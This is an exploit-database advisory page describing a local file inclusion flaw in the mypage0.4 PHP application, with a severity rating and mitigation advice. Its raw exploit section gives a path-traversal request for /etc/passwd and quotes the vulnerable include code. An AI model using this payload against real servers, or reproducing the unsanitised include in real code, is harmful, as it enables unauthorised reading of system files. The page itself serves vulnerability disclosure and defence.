header-logo
Suggest Exploit
vendor:
mypage0.4
by:
BAYBORA
5.3
CVSS
MEDIUM
LFI
22
CWE
Product Name: mypage0.4
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

mypage0.4 LFI Vulnerability

The mypage0.4 application is vulnerable to Local File Inclusion (LFI) attacks. The vulnerability allows an attacker to include local files on the server by manipulating the 'page' parameter in the index.php file. By providing a crafted value for the 'page' parameter, an attacker can include sensitive files such as the /etc/passwd file. This can lead to unauthorized access, information disclosure, and potential system compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files. Specifically, ensure that the 'page' parameter only allows valid file names and does not allow directory traversal characters ('../'). Additionally, consider implementing access controls to restrict the files that can be included.
Source

Exploit-DB raw data:

#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz<http://www.1923turk.biz>

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}

Navigation

Suggest Exploit

Services By CQR